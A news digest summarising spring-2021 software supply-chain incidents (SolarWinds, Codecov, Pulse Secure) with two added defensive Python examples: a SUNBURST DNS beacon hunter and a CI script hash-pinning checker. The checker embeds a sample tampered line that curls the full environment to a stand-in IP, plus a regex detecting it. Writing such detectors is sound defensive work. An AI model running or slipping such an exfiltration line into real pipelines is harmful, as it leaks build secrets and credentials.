Exposing severe security weaknesses in hybrid cloud, authentication, and least privileged access configurations, the high-profile SolarWinds breach laid bare just how vulnerable every business is. Enterprise leaders must see beyond the much-hyped baseline levels of identity and access management (IAM) and privileged access management (PAM) now offered by cloud providers.

Ref - VentureBeat 

_______________________________________________________________________________________

(May 14, 2021)


Supplemental direction (v4) on the implementation of CISA Emergency Directive (ED) 21-01

Agencies that have or had networks that used affected versions of SolarWinds Orion and have evidence of follow-on threat actor activity, such as binary beaconing to avsvmcloud[.]com and secondary C2 activity to a separate domain or IP address, including networks hosted by third parties on behalf of federal agencies, must comply with the applicable requirements for each network meeting respective conditions.
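The supplemental direction's first trigger condition is "binary beaconing to avsvmcloud[.]com". Below is an added example of how a defender would hunt for that in resolver logs; it is not CISA's code. The only indicator taken from the page is the avsvmcloud.com domain. The query shape `<dga-label>.appsync-api.<region>.avsvmcloud.com` is the publicly documented SUNBURST first-stage pattern and is used here as an assumption, and the log lines and DGA labels are constructed for the example.

```python
"""Flag DNS queries consistent with SUNBURST first-stage beaconing.

Added example, not code from CISA or any vendor named on the page.
The avsvmcloud.com indicator is from the page; the appsync-api/<region>
subdomain layout is an assumption, and the log sample is constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional

# SUNBURST first-stage C2 domain (defanged on the page as avsvmcloud[.]com).
SUNBURST_C2_DOMAIN = "avsvmcloud.com"

# Assumed beacon shape: <dga-label>.appsync-api.<region>.avsvmcloud.com
SUNBURST_QNAME_RE = re.compile(
    r"^(?P<dga>[a-z0-9]{12,})\.appsync-api\.(?P<region>[a-z]{2}-[a-z]+-\d)\.avsvmcloud\.com$"
)

# Constructed resolver log: "<timestamp> <client_ip> <qname> <qtype>"
SAMPLE_DNS_LOG = """\
2020-12-13T08:01:12Z 10.20.30.40 www.solarwinds.com A
2020-12-13T08:01:45Z 10.20.30.41 k1aq7v3m0p2x9y8z4w5t.appsync-api.us-west-2.avsvmcloud.com A
2020-12-13T08:02:03Z 10.20.30.42 login.microsoftonline.com A
2020-12-13T08:14:45Z 10.20.30.41 q9z8y7x6w5v4u3t2s1r0.appsync-api.eu-west-1.avsvmcloud.com A
2020-12-13T08:15:00Z 10.20.30.43 avsvmcloud.com.lookalike.example A
2020-12-13T08:15:20Z 10.20.30.44 mail.example.org MX
"""


def _normalize(qname: str) -> str:
    # Strip a trailing root dot and fold case so suffix checks are exact.
    return qname.rstrip(".").lower()


def queries_c2_domain(qname: str, c2_domain: str = SUNBURST_C2_DOMAIN) -> bool:
    """True if qname is the C2 domain itself or any label beneath it.

    A bare substring test would also match lookalikes such as
    avsvmcloud.com.lookalike.example, so anchor on the label boundary.
    """
    q = _normalize(qname)
    return q == c2_domain or q.endswith("." + c2_domain)


def classify_query(qname: str) -> Optional[dict]:
    """Return beacon details for a C2-domain query, or None for benign names."""
    if not queries_c2_domain(qname):
        return None
    m = SUNBURST_QNAME_RE.match(_normalize(qname))
    if m:
        return {"shape": "sunburst-dga", "dga": m["dga"], "region": m["region"]}
    # Any other query under the C2 domain still warrants a look.
    return {"shape": "other-avsvmcloud", "dga": None, "region": None}


def parse_dns_log(text: str) -> List[dict]:
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than abort the hunt
        ts, client, qname, qtype = parts
        records.append({"ts": ts, "client": client, "qname": qname, "qtype": qtype})
    return records


def find_beaconing_hosts(text: str) -> Dict[str, List[dict]]:
    """Map each internal client to its C2-domain queries, in log order."""
    hits: Dict[str, List[dict]] = defaultdict(list)
    for rec in parse_dns_log(text):
        info = classify_query(rec["qname"])
        if info is not None:
            hits[rec["client"]].append({**rec, **info})
    return dict(hits)


if __name__ == "__main__":
    for client, queries in find_beaconing_hosts(SAMPLE_DNS_LOG).items():
        for q in queries:
            print(f"{client} {q['ts']} {q['qname']} shape={q['shape']} region={q['region']}")
```

Hosts returned by `find_beaconing_hosts` are the ones the directive's Category 3 conditions are about: a beacon alone only proves the backdoored Orion build ran and called home, so the next step is to check those hosts for the secondary C2 to a separate domain or IP that the direction also names.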

Ref - DHS

_______________________________________________________________________________________

(May 14, 2021)


Guidance for networks affected by the SolarWinds and Active Directory/M365 Compromise

Remediation plans for dealing with malicious compromises are necessarily unique to every organization, and success requires careful consideration. There are three phases for evicting the actor: Pre-Eviction (actions to detect and identify APT activity and prepare the network for eviction); Eviction (actions to remove the APT actor from on-premises and cloud environments); and Post-Eviction (actions to ensure eviction was successful and the network has good cyber posture).

Ref - CISA 

_______________________________________________________________________________________

(May 14, 2021)


Effective tactics to prevent supply chain attacks

UpGuard recommends several strategies that give the best chance of preventing supply chain attacks, including deploying honeytokens, securing privileged access management (PAM), and adopting a zero trust architecture. It also recommends identifying potential insider threats, protecting vulnerable resources, and minimizing access to sensitive data.

Ref - Upguard 

_______________________________________________________________________________________

(May 14, 2021)


Rapid7 source code, alert data accessed in Codecov supply chain attack

Rapid7 has disclosed the compromise of customer data and partial source code due to the Codecov supply chain attack. The cybersecurity firm said it was one of the victims of the incident, in which an attacker obtained access to the Codecov Bash uploader script.

Ref - ZDNet
 
_______________________________________________________________________________________

(May 13, 2021)


Addressing SolarWinds through executive action

The Executive Order (EO) on cybersecurity is a much-needed step toward shoring up the nation’s cyber posture. On the heels of last week’s damaging ransomware attack on Colonial Pipeline, this EO is a necessary step forward. While the EO will not solve all of the security problems or prevent the next SolarWinds attack – and the truth is no single policy, government initiative, or technology will – it is a great start. 

Ref - Forbes 

_______________________________________________________________________________________

(May 13, 2021)


Third-party software may leave you vulnerable to cyberattacks

Leaders need new ways to reduce supply chain cybersecurity risks, whether they are buying digital products or producing them. The data showed that managers often fall prey to counterproductive and possibly dangerous mindsets that get in the way of securing supply chains and leave their companies exposed, and that they are often taking cues from the top.

Ref - HBR 

_______________________________________________________________________________________

(May 13, 2021)


Some implicitly trusted infrastructure areas can lead to supply chain compromises

Supply chains are vast, and this is by no means a comprehensive list of potential problems. A threat modeling exercise within the organization can give a more robust view of vulnerable infrastructure that is often overlooked. Users should take a concentrated look at the implicit trust relationships that they have with vendors and open-source software used in their build or manufacturing process and they will likely find many areas where trust supersedes security.


_______________________________________________________________________________________

(May 12, 2021)


How Biden’s new executive order plans to prevent another SolarWinds attack

The Biden administration has been drafting the order over the last few months. It is designed less to address an incident like the one experienced by Colonial Pipeline, a privately owned critical infrastructure operator believed to have been hit by a criminal gang, than to prevent a future SolarWinds-like incident.

 
_______________________________________________________________________________________

(May 12, 2021)


Senate hearing raises questions about SolarWinds backdoors

The U.S. Department of Commerce's CISO said during a Senate committee hearing Tuesday that his agency was one of the first to identify a SolarWinds-related compromise, raising questions about when the U.S. government initially detected the supply chain attacks.

 
_______________________________________________________________________________________

(May 12, 2021)


Supply chain penetration: Here’s how to protect from them

Effective protection of the supply chain means the adoption of a different mindset, one that assumes a breach will happen at some point. Because the supply chain represents a critical attack vector, an attack in this area could be a critical one, so cyber measures must be stepped up accordingly. Securing access to sensitive data and systems means organizations can reduce the risks significantly, thereby making it more difficult for attackers to achieve their end goals.


_______________________________________________________________________________________

(May 11, 2021)


Senators discuss federal cybersecurity following SolarWinds hack

Government officials say the 2020 SolarWinds cyber hack by the Russian government should have been a wake-up call. The U.S. is instead dealing with another cyber attack, this time on the largest fuel pipeline in the country. The SolarWinds and Pulse Secure VPN attacks targeted federal agencies and yet it was private sector companies that discovered them.

Ref - News10 

_______________________________________________________________________________________

(May 11, 2021)


Key challenges with modern AppSec and supply chain attacks

The OWASP API project has enumerated 10 critical API level threats that are substantially more important in the era of modern, cloud-native applications. The three key trends – microservice proliferation, application change, and porous perimeters – create an environment where attacks can flourish and where IT and security teams need to consider revisiting their application security practices and controls.

Ref - DevOps 

_______________________________________________________________________________________

(May 11, 2021)


SolarWinds CEO calls for collective action against state attacks

SolarWinds CEO Sudhakar Ramakrishna has revealed he is talking with his peers in the industry to form a consortium of like-minded, mid-market firms that could take collective action to defend themselves against nation state-backed malicious actors, such as Russia’s APT29, or Cozy Bear. Ramakrishna called for the industry to adopt a model of mutual responsibility and mutual accountability among smaller firms, noting that size alone is not an indicator of a company’s ability to protect itself from cyber attacks.


_______________________________________________________________________________________

(May 10, 2021)


Twilio, HashiCorp among Codecov supply chain hack victims

The stealthy software supply chain compromise of the Codecov Bash Uploader went undetected from January until April. The first company to publicly acknowledge exposure was HashiCorp, when a post-breach investigation found that a subset of its CI pipelines used the affected Codecov component. Following HashiCorp's statement, San Francisco-based Twilio issued an advisory confirming that it used the compromised Bash Uploader component in a small number of projects and CI pipelines.
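The Codecov entries above (this one and the Rapid7 one) describe the same failure mode: a CI pipeline fetched a helper script from the vendor and ran it with the build's secrets in its environment, so a silently modified script could ship those secrets off-box. The usual pattern was `bash <(curl -s https://codecov.io/bash)`, which executes whatever the server returns that day. Below is an added example of the check a pipeline should perform instead; it is not Codecov's code or any named company's. The two script bodies are constructed stand-ins, the pinned hash is derived from the clean stand-in so the example runs offline (in practice it is a constant recorded when the script was reviewed), and the `curl ... $(env)` heuristic is an assumption chosen for this example.

```python
"""Pin and verify a vendor CI script before executing it.

Added example for this page, not Codecov's code. Script bodies are
constructed; the pinned hash and the exfiltration heuristic are assumptions.
"""
import hashlib
import hmac
import re
from typing import Optional

# Heuristic: a curl invocation whose payload dumps the whole process
# environment (where CI tokens and keys live) to some remote host.
ENV_EXFIL_RE = re.compile(r"curl\b[^\n]*\$\(env\)")

# Constructed stand-in for a coverage uploader as reviewed and pinned.
CLEAN_UPLOADER = """#!/usr/bin/env bash
set -euo pipefail
report="${1:-coverage.xml}"
curl -sS -X POST --data-binary @"$report" "https://uploader.example/upload?token=$TOKEN"
"""

# Constructed tampered copy: one appended line that posts the environment
# to an attacker-controlled host (203.0.113.10 is a documentation address).
TAMPERED_UPLOADER = CLEAN_UPLOADER + """
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://203.0.113.10/upload
"""


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# In a real pipeline this is a literal committed next to the CI config.
PINNED_SHA256 = sha256_hex(CLEAN_UPLOADER.encode("utf-8"))


def looks_like_env_exfil(script: str) -> bool:
    """Second line of defence: refuse scripts that ship $(env) anywhere."""
    return ENV_EXFIL_RE.search(script) is not None


def check_script(script: bytes, pinned_sha256: str) -> Optional[str]:
    """Return None if the script may run, otherwise the reason to refuse it.

    The hash check is the real control: any byte changed upstream fails it.
    The content heuristic only matters if someone re-pins without reading
    the diff, which is exactly what the Codecov incident relied on.
    """
    actual = sha256_hex(script)
    if not hmac.compare_digest(actual, pinned_sha256.lower()):
        return f"sha256 mismatch: expected {pinned_sha256}, got {actual}"
    if looks_like_env_exfil(script.decode("utf-8", "replace")):
        return "script posts $(env) to a remote host"
    return None


if __name__ == "__main__":
    for name, body in (("clean", CLEAN_UPLOADER), ("tampered", TAMPERED_UPLOADER)):
        verdict = check_script(body.encode("utf-8"), PINNED_SHA256)
        print(f"{name}: {'run' if verdict is None else 'REFUSE: ' + verdict}")
```

The pipeline downloads the script to a file, calls `check_script` on its bytes, and only then executes it; a hash mismatch is a stop-the-build event that someone reads the upstream diff for, not a prompt to update the pin.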


_______________________________________________________________________________________

(May 10, 2021)


All you need to know about supply chain attacks and cloud-native

There are several characteristics of cloud-native application development environments that make them a lucrative target for attackers looking to embed malicious code into the supply chain. Cloud-native application development is characterized by the widespread use of open source components, often obtained from public registries. Additionally, container images, functions, and packages are updated frequently using CI/CD pipelines, creating multiple opportunities for attackers to embed themselves into the process.

Ref - TheNewStack 

_______________________________________________________________________________________

(May 10, 2021)


Cisco Threat Explainer: Supply Chain Attacks

There is a general pattern in supply chain attacks. First, the bad actors gather what information they can find about the primary target. Next, the bad actors attempt to compromise the secondary target. Once in, the attackers move laterally, their objective often being to compromise the secondary target’s software build system, where the source code for their software is stored, updated, and compiled.

Ref - Cisco 

_______________________________________________________________________________________

(May 10, 2021)


NIST and CISA release guidelines for defense against software supply chain attacks

The CISA and the NIST have released new guidelines on defending against various software supply chain risks. The agencies listed update hijacking, tampering with code signing, and the compromise of open-source code as the popular methods used by hackers to compromise software. Threat actors hijack update channels, like in the Russian NotPetya attack on Ukraine via tax accounting software. The SolarWinds Orion software supply chain attack employed similar tactics.

Ref - CPO Magazine 

_______________________________________________________________________________________

(May 10, 2021)


Ransomware attack on CaptureRx exposes multiple providers across the U.S.

Multiple healthcare providers across the United States are reporting being impacted by a ransomware attack on CaptureRx, a San Antonio-based company providing drug-related administrative services. The CaptureRx attack highlights the impact of the software supply chain, and Faxton St. Luke’s Healthcare in New York, Randolph, VT-based Gifford Health Care, and Thrifty Drug Stores are just a few of the victims.

Ref - ZDNet 

_______________________________________________________________________________________

(May 10, 2021)


The Colonial Pipeline ransomware attack and the SolarWinds hack were all but inevitable

Software supply chains and private sector infrastructure companies are vulnerable to hackers. Many U.S. companies outsource software development because of a talent shortage, and some of that outsourcing goes to companies in Eastern Europe that are vulnerable to Russian operatives.

Ref - Yahoo 

_______________________________________________________________________________________

(May 10, 2021)


SolarWinds shares more information on cyberattack impact, initial access vector

Texas-based IT management company SolarWinds shared more information on the impact of the significant breach disclosed late last year, and claimed that less than 100 of its customers were actually hacked. The company said the attacker only targeted its build system for the Orion product, but did not actually modify any source code repository, and the SUNBURST malware has not been found in any other product.


_______________________________________________________________________________________

(May 8, 2021)


Best practices to reduce supply chain cyber exposure

Cyber-attacks against the supply chain continue to grow — and some are simply impossible to eliminate. With that in mind, consider an approach rooted in cyber risk management. Whereas a traditional cybersecurity approach focuses primarily on mitigation, cyber risk management understands that not all risks can be removed and not all attacks can be prevented, especially when it comes to the supply chain.

Ref - Marsh
 
_______________________________________________________________________________________

(May 8, 2021)


SolarWinds says Russian Group likely took data during the cyberattack

While SolarWinds does not know how the Russia-backed group broke into its networks, the company believes the hackers may have used an unknown vulnerability, a brute-force attack, or social engineering such as a phishing operation. The hackers then conducted "research and surveillance" on the company, including its Microsoft Office 365 environment, for at least nine months before October 2019, when they moved to the "test run" phase of the attack.

Ref - Bloomberg 

_______________________________________________________________________________________

(May 8, 2021)


SolarWinds says Russian group likely took data during cyber-attack

The Russia-linked hackers who compromised popular software from the Texas-based firm SolarWinds last year broke into email accounts and likely took data from the firm. SolarWinds said it found evidence that "causes us to believe the threat actor exfiltrated certain information as part of its research and surveillance."


_______________________________________________________________________________________

(May 7, 2021)


Hackers accessed SolarWinds’ Office 365 since early 2019

Hackers persistently accessed SolarWinds' internal systems, Microsoft Office 365 environment, and software development environment for months before carrying out their cyberattack. The hackers compromised SolarWinds credentials and conducted research and surveillance via persistent access for at least nine months prior to their October 2019 trial run.

Ref - CRN 

_______________________________________________________________________________________

(May 7, 2021)


US-UK Government warns about SolarWinds attackers adding a new tool to its arsenal

Agencies in the U.S. and the U.K. published a joint report providing more details on the activities of the Russian cyberspy group that is believed to be behind the attack on IT management company SolarWinds. The report reveals that the hackers started using the open-source adversary simulation framework Sliver after some of their operations were exposed.

Ref - SecurityWeek 

_______________________________________________________________________________________

(May 7, 2021)


An investigative update of the cyberattack

SolarWinds has revealed that it has found evidence that the threat actor exfiltrated certain information as part of its research and surveillance. The threat actor created and moved files that contained source code for both Orion Platform software and non-Orion products. The threat actor created and moved additional files, including a file that may have contained data supporting SolarWinds’ customer portal application. The threat actor accessed email accounts of certain personnel, and also moved files to a jump server, which was possibly intended to facilitate exfiltration of the files out of the environment.

Ref - SolarWinds 

_______________________________________________________________________________________

(May 7, 2021)


FBI, NSA, CISA & NCSC Issue Joint Advisory on Russian SVR Activity

Government agencies from the United States and the United Kingdom have teamed up to issue a new joint advisory detailing the TTPs of Russia's Foreign Intelligence Service (SVR) after the group was publicly attributed to the SolarWinds supply chain attack. The agencies provided more details on SVR activity, including the exploitation that followed the SolarWinds Orion software compromise.


_______________________________________________________________________________________

(May 7, 2021)


Ransomware, supply chain attacks show no sign of abating

Ransomware and supply chain attacks are two of the most common attack vectors that offer high returns for threat actors. In the aftermath of the SolarWinds attack that had affected prominent companies like Microsoft, the panelists noted that more supply chain attacks have been enabled by the growing dependencies between systems that have become more interconnected than ever.


_______________________________________________________________________________________

(May 7, 2021)


Further TTPs associated with SVR cyber actors

Organizations are advised to follow the mitigation advice and guidance in the report, as well as the detection rules in its appendix, to help protect against this activity. Organizations should also follow the advice and guidance in the recently published NSA advisory and the FBI and CISA alert, which detail further TTPs linked to SVR cyber actors.


_______________________________________________________________________________________

(May 6, 2021)


Following SolarWinds hack, US spy agencies review software suppliers' ties to Russia

U.S. intelligence agencies have begun a review of supply chain risks emanating from Russia in light of the far-reaching hacking campaign that exploited software made by SolarWinds and other vendors. The review will focus on any supply chain vulnerabilities stemming from Russian companies, or the U.S. companies that do business in Russia.

Ref - CyberScoop 

_______________________________________________________________________________________

(May 5, 2021)


Twilio discloses breach caused by Codecov supply chain hack

Twilio posted a blog disclosing that a small number of customer emails had likely been exfiltrated by an unknown attacker who cloned Twilio's code repositories on GitHub in mid-April. The company further connected the activity to the Codecov breach disclosed last month.

Ref - TechTarget 

_______________________________________________________________________________________

(May 3, 2021)


New Hampshire pushes pause on creating supply chain authority

To reduce cybersecurity risks, a New Hampshire lawmaker has proposed legislation to create an Information Technology Supply Chain Risk Authority to oversee all purchases and acquisitions of software, hardware, and telecommunication services used within state agencies.

Ref - GovTech

_______________________________________________________________________________________

(May 3, 2021)


Stopping the next SolarWinds requires doing something different

The SolarWinds breach is not the first major supply chain breach, but previous similar breaches failed to prompt effective regulatory action. The SolarWinds breach came in via a trusted vendor, which means even the most diligent cyber hygiene and immediate patching would not have helped. Likewise, information sharing is important, but it took nine months to detect the SolarWinds attack — so by the time there was information to share, it was too late.

Ref - DarkReading 

_______________________________________________________________________________________

(May 3, 2021)


Key indicators that the supply chain vendor has been breached

If a vendor does not provide clear and substantial responses to risk assessments, it could be concealing gaping holes in its information security program. If a vendor's website or mobile app is behaving suspiciously, a cyberattack could be taking place. If your systems can monitor network activity between internal resources and vendors, establish a baseline for normal interaction and keep an eye out for login attempts outside of normal hours.

Ref - Upguard 

_______________________________________________________________________________________

(May 1, 2021)


More US agencies potentially hacked, this time with Pulse Secure exploits

At least five US federal agencies may have experienced cyberattacks that targeted recently discovered security flaws that give hackers free rein over vulnerable networks, the US CISA said. The zero-day vulnerability, tracked as CVE-2021-22893, was under active exploitation.

Ref - Ars Technica 

_______________________________________________________________________________________

(April 30, 2021)


Key questions to consider to help mitigate against supply chain attacks

With the recent SolarWinds SunBurst exploit, many security professionals are reassessing standard threat models and national cyber-defense strategies. How can organizations and system owners increase trust while still maintaining their own IT systems now? Enterprises can begin by rethinking their definition of access control, developing a patch management strategy that promotes research and testing, and monitoring their network for malicious behavior in collaboration with cyber threat intelligence.


_______________________________________________________________________________________

(April 30, 2021)


A tale of two hacks: from SolarWinds to Microsoft Exchange

The past four months have exposed two high-profile attacks, which both had pundits declaring them the “worst-ever” and “unprecedented.” They shared other similarities – both attacked businesses rather than individuals and affected tens of thousands of organizations. Both hacks involved nation-states. And in either case, no affected organization could be fully certain of finding and evicting any adversary.

Ref - ThreatPost 

_______________________________________________________________________________________

(April 29, 2021)


Finding the weakest link in the supply chain

An organization's cybersecurity defenses are only as strong as its weakest link. Successful supply chain attacks are considered especially dangerous because of their high potential for widespread contagion. With just one successful breach of a single vendor component, hackers could gain access to all of the organizations that make use of that vendor's supply chain.

Ref - Forbes 

_______________________________________________________________________________________

(April 29, 2021)


A new PHP composer bug could enable widespread supply-chain attacks

The maintainers of Composer, a package manager for PHP, have shipped an update to address a critical vulnerability that could have allowed an attacker to execute arbitrary commands and "backdoor every PHP package," resulting in a supply-chain attack. Tracked as CVE-2021-29472, the security issue was discovered and reported on April 22 by researchers from SonarSource, following which a hotfix was deployed less than 12 hours later.


_______________________________________________________________________________________

(April 29, 2021)


Biden preparing cybersecurity executive order in response to SolarWinds attack

President Biden is preparing a cybersecurity executive order focused on helping the country protect itself from future cyberattacks following the sophisticated SolarWinds hack that was discovered in December. The order, as it is written now, includes a spate of requirements that companies who conduct business with the government will be instructed to follow.

Ref - The Hill 

_______________________________________________________________________________________

(April 28, 2021)


Minimizing the risk of supply chain attacks – best practice guidelines

Sophos provides several recommendations to minimize the risk of supply chain attacks: switching from a reactive to a proactive approach to cybersecurity, monitoring for early signs of compromise, auditing the supply chain, assessing the security posture of all suppliers and business partners, and constantly reviewing IT security operations hygiene.

Ref - Sophos 

_______________________________________________________________________________________

(April 28, 2021)


Lawmakers want to create a reserve corps to respond to the next SolarWinds

A bipartisan group of lawmakers wants to create a National Guard-like program to address growing cybersecurity vulnerabilities faced by the U.S. government. Legislation introduced today would pilot two separate reserves of trained cybersecurity professionals for the Department of Homeland Security and the Defense Department.


_______________________________________________________________________________________

(April 28, 2021)


CISA issues guidance on defending against software supply chain attacks

The CISA has issued guidance following the compromise of the SolarWinds software that affected thousands of entities across the US and beyond. The guidance took the form of a primer for companies, explaining the nature of the software supply chain and the various access points where supply chain vulnerabilities exist. It concludes with concrete recommendations for both vendors and their customers with a discussion on the Secure Software Development Framework (SSDF) and Cyber Supply Chain Risk Management (C-SCRM).


_______________________________________________________________________________________

(April 28, 2021)


5 ways to protect software supply-chains from malicious attackers

Users can protect their organization against supply-chain attackers by avoiding the use of third-party modules; checking for threats when using modules created by unknown authors; performing automated scans of code submitted in repositories; having a plan made for external services; and creating an on-premises and cloud strategy.

Ref - Radware

_______________________________________________________________________________________

(April 27, 2021)


Another SolarWinds lesson: hackers are targeting Microsoft authentication servers

During SolarWinds, hackers directly targeted the AD FS servers to obtain certificates. Mandiant’s new attack does not require direct access to the AD FS server. Rather, hackers would spoof one AD FS server communicating with another to obtain its keys. This is not trivial, as it still requires credentials from an extremely privileged account to pull off. But given the capacity of the hackers involved in SolarWinds, chief information security officers should begin to see these kinds of attacks as part of the threat landscape.

Ref - SC Magazine 

_______________________________________________________________________________________

(April 27, 2021)


Software supply chain may get you by exploiting Open-Source libraries

Nearly all software programs developed today contain open-source components. Unfortunately, open-source packages have the same challenges as any other software (i.e. they contain security bugs). Worse, once included in an application they can become rapidly out of date, lacking the most recent bug fixes. On top of that, open-source code is freely available to everyone, so bad actors can study and experiment with it without fear of exposing their next wave of attacks.


_______________________________________________________________________________________

(April 27, 2021)


Defending against software supply chain attacks

The consequences of a software supply chain attack can be severe. First, threat actors use the compromised software vendor to gain privileged and persistent access to a victim network. By compromising a software vendor, they bypass perimeter security measures like border routers, firewalls, etc., and gain initial access. If a threat actor loses network access, they may re-enter a network using the compromised software vendor.

Ref - CISA 

_______________________________________________________________________________________

(April 27, 2021)


DFS report identifies key cybersecurity measures to reduce supply chain risk

The New York State Department of Financial Services (DFS) released a report on the Department’s investigation of New York’s financial services industry’s response to the supply chain attack on the IT company SolarWinds. During the SolarWinds attack, hackers corrupted routine software updates that were downloaded onto thousands of organizations’ information systems.


_______________________________________________________________________________________

(April 26, 2021)


SolarWinds, Microsoft hacks prompt focus on Zero-Trust security

Analysis by CISA, the NSA, and the FBI of the breaches, which exploited vulnerabilities in software from SolarWinds Corp. and Microsoft Corp., found that the hackers were often able to gain broad systems access. In many cases, the hackers moved through networks unfettered to set up back doors and administrator accounts. To prevent such attacks, zero-trust models should be more widely adopted by the public and private sectors.


_______________________________________________________________________________________

(April 26, 2021)


CISA and NIST release new interagency resource to defend against supply chain attacks

To help software vendors and customers defend against these attacks, CISA and the NIST have released Defending Against Software Supply Chain Attacks. This new interagency resource provides an overview of software supply chain risks and recommendations. The publication also provides guidance on using NIST’s Cyber Supply Chain Risk Management (C-SCRM) framework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate risks.

Ref - CERT-CISA 

_______________________________________________________________________________________

(April 26, 2021)


Another top VPN is reportedly being used to spread SolarWinds hack

Threat actors used the Pulse Secure VPN appliance to install the Supernova webshell in a victim’s SolarWinds Orion server and collect user credentials without permission, a new warning has said. This appears to be the first observed instance of a threat actor injecting the Supernova webshell directly into a victim’s SolarWinds installation.

Ref - TechRadar 

_______________________________________________________________________________________

(April 25, 2021)


Stopping SolarWinds-style mega hacks, but preserving democracy

The SolarWinds and Shirbit hacks announced last December, along with a variety of other major cyberattacks, have convinced the US and Israeli governments that leaps forward are needed to keep up with the new frenetic pace of digital warfare. And taking countermeasures involves several challenges. One of the challenges is that the NSA is more limited by law from counter-hacking a US computer already hacked by a foreign adversary than it is going against foreign computers.


_______________________________________________________________________________________

(April 24, 2021)


HashiCorp is the latest victim of the Codecov supply-chain attack

Open-source software tools and Vault maker HashiCorp has disclosed a security incident that occurred due to the recent Codecov attack. HashiCorp, a Codecov customer, has stated that the recent Codecov supply-chain attack aimed at collecting developer credentials led to the exposure of HashiCorp's GPG signing key.


_______________________________________________________________________________________

(April 23, 2021)


Senators introduce legislation to protect critical infrastructure against attack

Sens. Maggie Hassan (D-N.H.) and Ben Sasse (R-Neb.) on Friday introduced legislation intended to protect critical infrastructure from cyberattacks and other national security threats. The National Risk Management Act would require the CISA to conduct a five-year national risk management cycle.
 
Ref - The Hill 

_______________________________________________________________________________________

(April 23, 2021)


Passwordstate password manager hacked in a supply chain attack

Click Studios, the company behind the Passwordstate enterprise password manager, notified its customers that attackers compromised the app's update mechanism to deliver malware in a supply-chain attack after breaching its networks. Malicious upgrades leading to the supply chain compromise were potentially downloaded by customers between April 20 and April 22.


_______________________________________________________________________________________

(April 23, 2021)


Supply chain attack risk looms over three million mobile app users of CocoaPods

A remote code execution (RCE) vulnerability in the central CocoaPods server could have potentially impacted up to three million mobile apps that relied on the open-source package manager. CocoaPods maintainer Orta Therox likened the potential impact of the flaw to that caused by XcodeGhost, a counterfeit version of macOS development environment Xcode.

Ref - PortSwigger 

_______________________________________________________________________________________

(April 23, 2021)


New analysis uncovers extensive SolarWinds attack infrastructure

Cybersecurity researchers that have been tracking the infrastructure footprint of SolarWinds threat actors claim the network of servers used in the attack is "significantly larger than previously identified". RiskIQ has identified an additional 18 command and control (C&C) servers that communicated with the malicious payloads that were dropped as part of the cyberattack.

Ref - TechRadar 

_______________________________________________________________________________________

(April 22, 2021)


SUPERNOVA redux, with a portion of masquerading

The SolarWinds attack has a few interesting traits. The first is that the adversary is using residential IP addresses based in the US to make them appear as US-based employees and then leveraging valid accounts to gain access via the VPN. From there, the adversary used a VM and obfuscated PowerShell scripts to move laterally to the SolarWinds server. At this point, the SUPERNOVA webshell is installed. 

Ref - Splunk 

_______________________________________________________________________________________

(April 22, 2021)


CISA identifies Supernova malware during incident response

CISA has revealed that the SolarWinds attackers connected to the entity’s network via a Pulse Secure virtual private network (VPN) appliance, moved laterally to its SolarWinds Orion server, installed malware referred to by security researchers as SUPERNOVA (a .NET webshell), and collected credentials. CISA has released a report providing TTPs observed during an incident response engagement.

Ref - CISA 

_______________________________________________________________________________________

(April 22, 2021)


SolarWinds hack analysis reveals 56% boost in command server footprint

The Sunburst/Solorigate backdoor was designed to identify, avoid, or disable different security products, with a particular focus on circumventing antivirus software developed by FireEye, CrowdStrike, Microsoft, ESET, and F-Secure in the first stage of infection. The second and third stages included custom droppers (Teardrop/Raindrop) and the deployment of additional malware alongside Cobalt Strike. Implants for persistence with components dubbed Goldmax/GoldFinder/Sibot, as well as Sunshuttle, have also been connected to these stages. 

Ref - ZDNet 

_______________________________________________________________________________________

(April 22, 2021)


Software supply chain may get you by exploiting third-party applications

Attacks targeting “zero-days,” or unpatched security bugs, in commonly used third-party applications are another example of the risks from the software supply chain. The recent attacks on the Microsoft Exchange Server are just the latest examples of this type of software supply chain attack. In this case, bugs in Exchange Server allowed attackers to read emails and install a web shell.


_______________________________________________________________________________________

(April 22, 2021)


Supernova threat actors masqueraded as remote workers to access breached network

Members of an APT group, masquerading as teleworking employees with legitimate credentials, accessed a U.S. organization's network and planted a backdoor called Supernova on its SolarWinds Orion server for conducting reconnaissance, domain mapping, and data theft. The attackers had access to the network for nearly one year, from March 2020 to February 2021, before they were discovered and blocked.

Ref - DarkReading 

_______________________________________________________________________________________

(April 21, 2021)


White House shares learnings from the SolarWinds and Microsoft Exchange server cyber incidents

Lessons learned from the recent attacks include 'integrating private sector partners at the executive and tactical levels'. It also includes involving private sector organizations in the response in order to help deliver fixes smoothly, like Microsoft's one-click tool to simplify and accelerate victims' patching and clean-up efforts, as well as sharing relevant information between firms.

Ref - ZDNet 

_______________________________________________________________________________________

(April 20, 2021)


A software supply chain may take you down via vendor compromise

Arguably the most sophisticated of the supply chain attack methods, a Vendor Compromise typically starts with a reconnaissance phase to understand which organizations use the vendor’s software, and other relevant details. Next, the bad actor attempts to gain valid vendor employee credentials via social engineering, phishing, or other more technical means. The malicious operator then attempts to laterally move to the software build environment in order to modify the source code of the application that the vendor provides to its users.


_______________________________________________________________________________________

(April 20, 2021)


The wide web of nation-state hackers attacking the US

As both the SolarWinds supply chain and Microsoft Exchange Server attacks have shown, the targets are no longer limited to federal agencies and the largest companies. Enterprises of all sizes are now at risk, whether from ransomware or a data breach. In terms of attacks on the U.S., nation-state threat actors typically (but not always) come from the "big four": China, Russia, North Korea, and Iran.

Ref - TechTarget 

_______________________________________________________________________________________

(April 20, 2021)


Codecov supply chain attack has echoes of SolarWinds

To date, Codecov says that it has detected periodic alterations of the Bash uploader script going back as far as 31 January, which ultimately could have allowed whoever was behind the attack to export information stored in its users’ continuous integration (CI) environments. Among Codecov’s larger customers, both HPE and IBM confirmed to Reuters that they were now probing their own systems for signs of intrusion.


_______________________________________________________________________________________

(April 20, 2021)


Hundreds of networks reportedly hacked in Codecov supply-chain attack

In new reporting by Reuters, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this breach beyond just Codecov's systems. Codecov had suffered a supply-chain attack that went undetected for over two months.


_______________________________________________________________________________________

(April 19, 2021)


White House stands down SolarWinds, Microsoft Exchange cyber response groups

